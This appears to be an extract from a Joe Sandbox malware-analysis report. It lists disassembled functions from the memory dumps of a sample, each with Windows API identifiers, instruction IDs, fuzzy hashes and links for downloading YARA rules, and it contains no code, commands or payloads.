                                                                                                                • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                                                                • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                                                                                Function 00007FFBC3202630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3140674995-0
                                                                                                                • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                                                                • Instruction ID: c09f5866895955077d0dde4ac92d8145ab44faf40904bb5ab03130ef3490085c
                                                                                                                • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                                                                • Instruction Fuzzy Hash: 81313EB2609B8186EB609F70E840BEE7375FB94744F88413ADA4E5BB94DF38D648C710
                                                                                                                Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1269745586-0
                                                                                                                • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                                                                • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                                                                                • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                                                                • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                                                                                Function 00007FFBC32076E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1239891234-0
                                                                                                                • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                                                                • Instruction ID: 4afa9733bd0a601e8ff2b8ecf524a7740c782461be4c4e5144c9758b0d8b4531
                                                                                                                • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                                                                • Instruction Fuzzy Hash: 35318F72618B8186DF60DF34E840AAE73A4FB88794F980136EA8D57B55DF3CD549CB00
                                                                                                                Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                • String ID:
                                                                                                                • API String ID: 1445889803-0
                                                                                                                • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                                                                • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                                                                                • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                                                                • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                                                                                Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                                                                                • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 1617791916-0
                                                                                                                • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                                                                • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                                                                                • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                                                                • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                                                                                Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContext
                                                                                                                • String ID:
                                                                                                                • API String ID: 2202868296-0
                                                                                                                • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                                                                • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                                                                                • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                                                                • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                                                                                Function 00007FFBC3210248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise_clrfp
                                                                                                                • String ID:
                                                                                                                • API String ID: 15204871-0
                                                                                                                • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                                                                • Instruction ID: 6fcbd9363a8492b1145fe2c23ead6b395b885e5e36e3b060233b142135708869
                                                                                                                • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                                                                • Instruction Fuzzy Hash: 80B17CB3600B898BEB15CF39C5867ADBBA0F744B48F58C921DA5D877A8CB39D851D700
                                                                                                                Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharErrorLastMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 203985260-0
                                                                                                                • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                                                                • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                                                                                • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                                                                • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                                                                                Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                                                                • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                                                                                • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                                                                • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                                                                                Function 00007FFBC320A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                                                                • Instruction ID: 752b30ee6a74ca8a5fb752e5dad1cfac5da2586f03e9423cee0e9e56ae9a8e29
                                                                                                                • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                                                                • Instruction Fuzzy Hash: AF51C6B2B0868185EF20EF76E8449AF7BA4BB44B94F984135EE5D3BA95CE3CD405C700
                                                                                                                Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EntryFunctionLookup
                                                                                                                • String ID:
                                                                                                                • API String ID: 3852435196-0
                                                                                                                • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                                                                • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                                                                                • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                                                                • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                                                                                Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                                                                • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                                                                                • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                                                                • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                                                                                Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2299586839-0
                                                                                                                • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                                                                • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                                                                                • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                                                                • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                                                                                Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -
                                                                                                                • API String ID: 0-2547889144
                                                                                                                • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                                                                • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                                                                                • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                                                                • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                                                                                Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -
                                                                                                                • API String ID: 0-2547889144
                                                                                                                • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                                                                • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                                                                                • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                                                                • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                                                                                Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                                                                • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                                                                                • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                                                                • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                                                                                Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -
                                                                                                                • API String ID: 0-2547889144
                                                                                                                • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                                                                • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                                                                                • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                                                                • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                                                                                Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -
                                                                                                                • API String ID: 0-2547889144
                                                                                                                • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                                                                • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                                                                                • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                                                                • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                                                                                Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
